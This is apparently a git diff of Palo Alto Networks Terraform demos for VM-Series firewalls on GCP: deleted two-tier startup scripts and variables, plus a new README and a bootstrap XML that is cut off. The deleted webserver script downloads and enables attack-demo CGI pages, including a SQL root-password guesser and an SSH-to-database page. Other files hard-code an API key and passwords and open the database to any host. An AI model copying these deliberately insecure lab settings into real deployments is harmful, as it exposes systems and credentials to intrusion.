--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/dbserver-startup.sh
+++ /dev/null
@@ -1,24 +0,0 @@
-#!/bin/bash
-sudo exec > >(sudo tee /var/log/user-data.log|logger -t user-data -s 2> sudo /dev/console) 2>&1
-FW_NIC3="10.5.3.4"
-while true
-    do 
-        resp=$(curl -s -S -g -k "https://$FW_NIC3/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=")
-	echo $resp
-        if [[ $resp == *"[CDATA[yes"* ]] ; then
-            break
-        fi
-        sleep 10s
-    done
-sudo apt-get update
-sudo apt-get -y install debconf-utils 
-sudo DEBIAN_FRONTEND=noninteractive | apt-get install -y mysql-server 
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1')"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.user WHERE User=''" 
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "DELETE FROM mysql.db WHERE Db='test' OR Db='test\\_localhost';"
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;" 
-sudo sed -i "s/.*bind-address.*/bind-address = 0.0.0.0/" /etc/mysql/mysql.conf.d/mysqld.cnf
-sudo systemctl restart mysql && sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE DATABASE Demo;" 
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "CREATE USER 'demouser'@'%' IDENTIFIED BY 'paloalto@123';" 
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "GRANT ALL PRIVILEGES ON Demo.* TO 'demouser'@'%';" 
-sudo mysql --defaults-file=/etc/mysql/debian.cnf -e "FLUSH PRIVILEGES;"
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh
deleted file mode 100644
index 02dd7129..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/scripts/webserver-startup.sh
+++ /dev/null
@@ -1,42 +0,0 @@
-#! /bin/bash
-exec > >(tee /var/log/user-data.log|logger -t user-data -s 2>/dev/console) 2>&1
-dbip="10.5.3.5"
-FW_NIC2="10.5.2.4"
-while true
-    do 
-        resp=$(curl -s -S -g -k "https://$FW_NIC2/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=LUFRPT1CU0dMRHIrOWFET0JUNzNaTmRoYmkwdjBkWWM9alUvUjBFTTNEQm93Vmx0OVhFRlNkOXdJNmVwYWk5Zmw4bEs3NjgwMkh5QT0=")
-	echo $resp
-        if [[ $resp == *"[CDATA[yes"* ]] ; then
-            break
-        fi
-        sleep 10s
-    done
-apt-get update
-apt-get install -y apache2 wordpress
-ln -sf /usr/share/wordpress /var/www/html/wordpress
-gzip -d /usr/share/doc/wordpress/examples/setup-mysql.gz
-while true; do
-  resp=$(mysql -udemouser -ppaloalto@123 -h "$dbip" -e 'show databases')
-  echo "$resp"
-  if [[ "$resp" = *"Demo"* ]]
-       then
-            break
-  fi
- sleep 5s
-done
-bash /usr/share/doc/wordpress/examples/setup-mysql -n Demo -t "$dbip" "$dbip"
-sed -i "s/define('DB_USER'.*/define('DB_USER', 'demouser');/g" /etc/wordpress/config-"$dbip".php
-sed -i "s/define('DB_PASSWORD'.*/define('DB_PASSWORD', 'paloalto@123');/g" /etc/wordpress/config-"$dbip".php
-wget -O /usr/lib/cgi-bin/guess-sql-root-password.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/guess-sql-root-password.cgi
-chmod +x /usr/lib/cgi-bin/guess-sql-root-password.cgi
-sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/guess-sql-root-password.cgi
-wget -O /usr/lib/cgi-bin/ssh-to-db.cgi https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/ssh-to-db.cgi
-chmod +x /usr/lib/cgi-bin/ssh-to-db.cgi
-sed -i "s/DB-IP-ADDRESS/$dbip/g" /usr/lib/cgi-bin/ssh-to-db.cgi
-wget -O /var/www/html/showheaders.php https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/showheaders.php
-wget -O /var/www/html/sql-attack.html https://raw.githubusercontent.com/jasonmeurer/azure-appgw-stdv2/master/sql-attack.html
-ln -sf /etc/apache2/conf-available/serve-cgi-bin.conf /etc/apache2/conf-enabled/serve-cgi-bin.conf
-ln -sf /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
-sudo ln -s /etc/wordpress/config-"$dbip".php /etc/wordpress/config-default.php
-systemctl restart apache2
-
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf b/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf
deleted file mode 100644
index bb6e19f0..00000000
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/variables.tf
+++ /dev/null
@@ -1,176 +0,0 @@
-/*
-*************************************************************************************************************
-**                                                                                                         **
-**  author:  mmclimans                                                                                     **
-**  date:    4/1/19                                                                                        **
-**  contact: mmclimans@paloaltonetworks.com                                                                **
-**                                                                                                         **  
-**                                              SUPPORT POLICY                                             **
-**                                                                                                         **
-**  This build is released under an as-is, best effort, support policy.                                    **
-**  These scripts should be seen as community supported and Palo Alto Networks will contribute our         **
-**  expertise as and when possible. We do not provide technical support or help in using or                **
-**  troubleshooting the components of the project through our normal support options such as               **
-**  Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support    ** 
-**  options. The underlying product used (the VM-Series firewall) by the scripts or templates are still    ** 
-**  supported, but the support is only for the product functionality and not for help in deploying or      ** 
-**  using the template or script itself. Unless explicitly tagged,  all projects or work posted in our     **
-**  GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads  **
-**  page on https://support.paloaltonetworks.com are provided under the best effort policy.                **
-**                                                                                                         **
-*************************************************************************************************************
-*/
-
-variable "my_gcp_project" {
-  description = "Enter the Project ID of an existing GCP project:"
- # default     = "my-gcp-project-0000001"
-}
-variable "gcp_credentials_file" {
-  description = "Enter the JSON GCE API KEY for your environment (the json must exist in the main.tf directory)"
- # default     = "gcp-credentials.json"
-} 
-variable "bootstrap_bucket" {
-  description = "Enter globally unique name for the new bootstrap bucket"
- # default = "vmseries-2tier-75834523984575432"
-}
-variable "gcp_key_file" {
-  description = "Enter your public key (this is only required if you need to access the DB and WEB VMs):"
- # default = "gcloudkey.pub"
-}
-variable "gcp_ssh_user" {
-  description = "Enter the username value associated with the GCP public key:"
-  default     = "ubuntu"
-}
-
-variable "fw_image" {
-  # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-byol-810"
-  # default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle2-810"
-  default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries-bundle1-814"
-}
-variable "region" {
-  description = "Enter the region to deploy the build:"
-  default     = "us-east4"
-}
-variable "zone" {
-  description = "Enter the region's zone:"
-  default     = "us-east4-a"
-}
-
-/*
-*************************************************************************************************************
-**                                                                                                         **
-**                THE VARIABLES BELOW DO NOT BE CHANGED TO RUN THE TWO-TIER DEMO!!!                        **
-**                                                                                                         **
-*************************************************************************************************************
-*/
-
-#############################################################################################################
-# GCP VPC VARIABLES
-variable "mgmt_vpc" {
-  default = "mgmt-vpc"
-}
-variable "mgmt_vpc_subnet" {
-  default = "mgmt-subnet"
-}
-variable "mgmt_vpc_subnet_cidr" {
-  default = "10.5.0.0/24"
-}
-variable "untrust_vpc" {
-  default = "untrust-vpc"
-}
-variable "untrust_vpc_subnet" {
-  default = "untrust-subnet"
-}
-variable "untrust_vpc_subnet_cidr" {
-  default = "10.5.1.0/24"
-}
-variable "web_vpc" {
-  default = "web-vpc"
-}
-variable "web_vpc_subnet" {
-  default = "web-subnet"
-}
-variable "web_vpc_subnet_cidr" {
-  default = "10.5.2.0/24"
-}
-variable "db_vpc" {
-  default = "db-vpc"
-}
-variable "db_vpc_subnet" {
-  default = "db-subnet"
-}
-variable "db_vpc_subnet_cidr" {
-  default = "10.5.3.0/24"
-}
-################################################################################################################
-################################################################################################################
-# VM-SERIES VM VARIABLES
-variable "fw_vm_name" {
-  default = "vmseries-vm"
-}
-variable "fw_machine_type" {
-  default = "n1-standard-4"
-}
-variable "fw_machine_cpu" {
-  default = "Intel Skylake"
-}
-variable "fw_nic0_ip" {
-  default = "10.5.0.4"
-}
-variable "fw_nic1_ip" {
-  default = "10.5.1.4"
-}
-variable "fw_nic2_ip" {
-  default = "10.5.2.4"
-}
-variable "fw_nic3_ip" {
-  default = "10.5.3.4"
-}
-################################################################################################################
-################################################################################################################
-# WEB-VM VARIABLES
-variable "web_vm_name" {
-  default = "web-vm"
-}
-variable "web_machine_type" {
-  default = "f1-micro"
-}
-variable "web_nic0_ip" {
-  default = "10.5.2.5"
-}
-################################################################################################################
-################################################################################################################
-# DB-VM VARIABLES
-variable "db_vm_name" {
-  default = "db-vm"
-}
-variable "db_machine_type" {
-  default = "f1-micro"
-}
-variable "db_nic0_ip" {
-  default = "10.5.3.5"
-}   
-variable "vm_image" {
-   default = "ubuntu-os-cloud/ubuntu-1804-lts"
-}
-################################################################################################################
-################################################################################################################
-variable "fw_scopes" {
-  default = [
-    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
-    "https://www.googleapis.com/auth/devstorage.read_only",
-    "https://www.googleapis.com/auth/logging.write",
-    "https://www.googleapis.com/auth/monitoring.write",
-  ]
-}
-
-variable "vm_scopes" {
-  default = ["https://www.googleapis.com/auth/cloud.useraccounts.readonly",
-    "https://www.googleapis.com/auth/devstorage.read_only",
-    "https://www.googleapis.com/auth/logging.write",
-    "https://www.googleapis.com/auth/monitoring.write",
-    "https://www.googleapis.com/auth/compute.readonly",
-  ]
-}
-
-
diff --git a/gcp/ilbnh-mig/README.md b/gcp/ilbnh-mig/README.md
new file mode 100644
index 00000000..e617ff44
--- /dev/null
+++ b/gcp/ilbnh-mig/README.md
@@ -0,0 +1,76 @@
+## MultiNic ILB Deployment
+This is a Terraform version of the manual build described at:
+https://cloud.google.com/load-balancing/docs/internal/setting-up-ilb-next-hop
+
+Terraform creates a VM-Series firewall that secures egress and east-west traffic for 2 internal VPCs.  Egress traffic from the internal VPCs is routed via the Load Balancer as Next Hop to the VM-Series. The FW is deployed via a Managed Instance Group to allow for automatic failure detection/repacement. 
+
+### Overview
+* 4 x VPCs (testing,management,production, production2)
+* 1 x VM-Series (BYOL / Bundle1 / Bundle2) in a Managed Instance Group
+* 1 x Ubuntu VM in the testing VPC (install Apache during creation)
+* 1 x Ubuntu VM in the production VPC (install Apache during creation)
+* 1 x GCP Internal Load Balancer in the testing VPC
+* 1 x GCP Internal Load Balancer in the production VPC
+* 1 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness)
+</br>
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/ilbnh-mig/images/diagram.svg" width="550">
+</p>
+
+
+### Prerequistes 
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+     * **Username:** paloalto
+     * **Password:** Pal0Alt0@123
+
+### Deployment
+1.  Download the **ilbnh-mig** repo to the machine running the build
+2.  In an editor, open **terraform.tfvars** and set values for the following variables
+
+| Variable        | Description |
+| :------------- | :------------- |
+| `project_id` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. |
+| `public_key_path` | Public key used to authenticate to the FW (username: admin) and the Ubuntu VMs (username:demo) |
+| `fw_panos` | The species and version of the FW to deploy |
+| `auth_file`| Authentication key file for deployment |
+
+3.  Download project authenication key files to the main directory of the terraform build.
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/ilbnh-mig/images/directory.png" width="550">
+</p>
+
+4. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After the deployment finishes, navigate to the console and not the public IP address associated with one of the ubuntu servers.
+
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/ilbnh-mig/images/deployment.png" width="550">
+</p>
+
+6. Connect to the server and issue the curl command to its peer.
+
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/ilbnh-mig/images/curl.png" width="550">
+</p>
+
+7. Login to the FW and note the traffic logs.
+<p align="center">
+<img src="https://raw.githubusercontent.com/wwce/terraform/master/gcp/ilbnh-mig/images/fwlogs.png" width="550">
+</p>
+
+8. Destroy the envirnment when done.
+```
+$ terraform destroy
+```
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/ilbnh-mig/bootstrap_files/authcodes b/gcp/ilbnh-mig/bootstrap_files/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/ilbnh-mig/bootstrap_files/authcodes
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml
new file mode 100644
index 00000000..a354ec4f
--- /dev/null
+++ b/gcp/ilbnh-mig/bootstrap_files/bootstrap.xml
@@ -0,0 +1,1099 @@
+<?xml version="1.0"?>
+<config urldb="paloaltonetworks" version="9.0.0">
+  <mgt-config>
+    <users>
+      <entry name="paloalto">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$swuuvbfr$TeXPJ5vj8FQP5E9NiByN40</phash>
+      </entry>
+      <entry name="admin">
+        <permissions>
+          <role-based>
+            <superuser>yes</superuser>
+          </role-based>
+        </permissions>
+        <phash>$1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ.</phash>
+        <public-key>c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDblNZOFdJbktrdGhVZnExdjFoSnlWdHhCSEpTYlRWQnhTTFBwYXg3MGUwRW5sZVZkdGk0VURLUFplREpQMVVxWjNYWjZIblk0L1NzQnhocFFXeW1LenpNYURqVnZ3TWhtcm04ampXYndRYXlqdEk4UVl0SnZNa1RhcHYwT2hWZTBmUUM5VXdTTnFHZ2FTKzVnUGdJRWVPaTB0a01OeU10VjY2bmhCL05ubktqc3RLSnoxYmt5K3RPUnQyeWNvYmdZWVJMdytRdWVLYmpHTkxFSTcrWkp5ak5URm8rUFAyaFZ4Q3hJL2ZzTnpvcTFjNjgyOXVkcmhwOUZsODhqbGNPSFdsYTUrMnRXS0VNVVRrKzY5eXZ3TmhrL3lvZ2F5VUFZZTJROXpEOG9pb2RzVnZSV29VOTk3dmt6TFE3c3FHT0VTYzk5a0xJTzFWaGtGalZHTDExSnogc3R1ZGVudC0wMy0wYWQ5MTllODQ2NmJAcXdpa2xhYnMubmV0</public-key>
+      </entry>
+    </users>
+  </mgt-config>
+  <shared>
+    <application/>
+    <application-group/>
+    <service/>
+    <service-group/>
+    <botnet>
+      <configuration>
+        <http>
+          <dynamic-dns>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </dynamic-dns>
+          <malware-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </malware-sites>
+          <recent-domains>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </recent-domains>
+          <ip-domains>
+            <enabled>yes</enabled>
+            <threshold>10</threshold>
+          </ip-domains>
+          <executables-from-unknown-sites>
+            <enabled>yes</enabled>
+            <threshold>5</threshold>
+          </executables-from-unknown-sites>
+        </http>
+        <other-applications>
+          <irc>yes</irc>
+        </other-applications>
+        <unknown-applications>
+          <unknown-tcp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-tcp>
+          <unknown-udp>
+            <destinations-per-hour>10</destinations-per-hour>
+            <sessions-per-hour>10</sessions-per-hour>
+            <session-length>
+              <maximum-bytes>100</maximum-bytes>
+              <minimum-bytes>50</minimum-bytes>
+            </session-length>
+          </unknown-udp>
+        </unknown-applications>
+      </configuration>
+      <report>
+        <topn>100</topn>
+        <scheduled>yes</scheduled>
+      </report>
+    </botnet>
+    <content-preview>
+      <application/>
+      <application-type>
+        <category/>
+        <technology/>
+      </application-type>
+    </content-preview>
+  </shared>
+  <devices>
+    <entry name="localhost.localdomain">
+      <network>
+        <interface>
+          <ethernet>
+            <entry name="ethernet1/1">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <mtu>1460</mtu>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+                <dhcp-client/>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/2">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+            <entry name="ethernet1/3">
+              <layer3>
+                <ipv6>
+                  <neighbor-discovery>
+                    <router-advertisement>
+                      <enable>no</enable>
+                    </router-advertisement>
+                  </neighbor-discovery>
+                </ipv6>
+                <ndp-proxy>
+                  <enabled>no</enabled>
+                </ndp-proxy>
+                <dhcp-client>
+                  <create-default-route>no</create-default-route>
+                </dhcp-client>
+                <lldp>
+                  <enable>no</enable>
+                </lldp>
+              </layer3>
+            </entry>
+          </ethernet>
+          <loopback>
+            <units>
+              <entry name="loopback.1">
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <ip>
+                  <entry name="10.30.1.99/32"/>
+                </ip>
+                <interface-management-profile>hc-tcp-22</interface-management-profile>
+              </entry>
+              <entry name="loopback.2">
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <ip>
+                  <entry name="10.50.1.99/32"/>
+                </ip>
+                <interface-management-profile>hc-tcp-22</interface-management-profile>
+              </entry>
+              <entry name="loopback.3">
+                <adjust-tcp-mss>
+                  <enable>no</enable>
+                </adjust-tcp-mss>
+                <ip>
+                  <entry name="10.40.1.99/32"/>
+                </ip>
+                <interface-management-profile>hc-tcp-22</interface-management-profile>
+              </entry>
+            </units>
+          </loopback>
+        </interface>
+        <profiles>
+          <monitor-profile>
+            <entry name="default">
+              <interval>3</interval>
+              <threshold>5</threshold>
+              <action>wait-recover</action>
+            </entry>
+          </monitor-profile>
+          <interface-management-profile>
+            <entry name="hc-tcp-22">
+              <http>no</http>
+              <ssh>yes</ssh>
+              <permitted-ip>
+                <entry name="35.191.0.0/16"/>
+                <entry name="130.211.0.0/22"/>
+              </permitted-ip>
+            </entry>
+          </interface-management-profile>
+        </profiles>
+        <ike>
+          <crypto-profiles>
+            <ike-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                  <member>3des</member>
+                </encryption>
+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="trust1">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+              <member>loopback.1</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="probe1">
+                    <nexthop>
+                      <ip-address>10.30.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>Health-Check-Probe1</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="probe2">
+                    <nexthop>
+                      <ip-address>10.30.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/1</interface>
+                    <metric>10</metric>
+                    <destination>Health-Check-Probe2</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="10-50">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <next-vr>trust2</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <metric>10</metric>
+                    <destination>10.50.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="10-40">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <next-vr>trust3</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <metric>10</metric>
+                    <destination>10.40.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+          </entry>
+          <entry name="trust2">
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <protocol>
+              <bgp>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <enable>no</enable>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="probe1">
+                    <nexthop>
+                      <ip-address>10.50.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>Health-Check-Probe1</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="probe2">
+                    <nexthop>
+                      <ip-address>10.50.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/2</interface>
+                    <metric>10</metric>
+                    <destination>Health-Check-Probe2</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="10-30">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <next-vr>trust1</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <metric>10</metric>
+                    <destination>10.30.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="10-40">
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <nexthop>
+                      <next-vr>trust3</next-vr>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <metric>10</metric>
+                    <destination>10.40.1.0/24</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                </static-route>
+              </ip>
+            </routing-table>
+            <admin-dists>
+              <rip>120</rip>
+            </admin-dists>
+            <interface>
+              <member>ethernet1/2</member>
+              <member>loopback.2</member>
+            </interface>
+          </entry>
+          <entry name="trust3">
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+            <protocol>
+              <bgp>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+                <enable>no</enable>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <routing-table>
+              <ip>
+                <static-route>
+                  <entry name="probe1">
+                    <nexthop>
+                      <ip-address>10.40.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
+                      <hold-time>2</hold-time>
+                    </path-monitor>
+                    <interface>ethernet1/3</interface>
+                    <metric>10</metric>
+                    <destination>Health-Check-Probe1</destination>
+                    <route-table>
+                      <unicast/>
+                    </route-table>
+                  </entry>
+                  <entry name="probe2">
+                    <nexthop>
+                      <ip-address>10.40.1.1</ip-address>
+                    </nexthop>
+                    <bfd>
+                      <profile>None</profile>
+                    </bfd>
+                    <path-monitor>
+                      <enable>no</enable>
+                      <failure-condition>any</failure-condition>
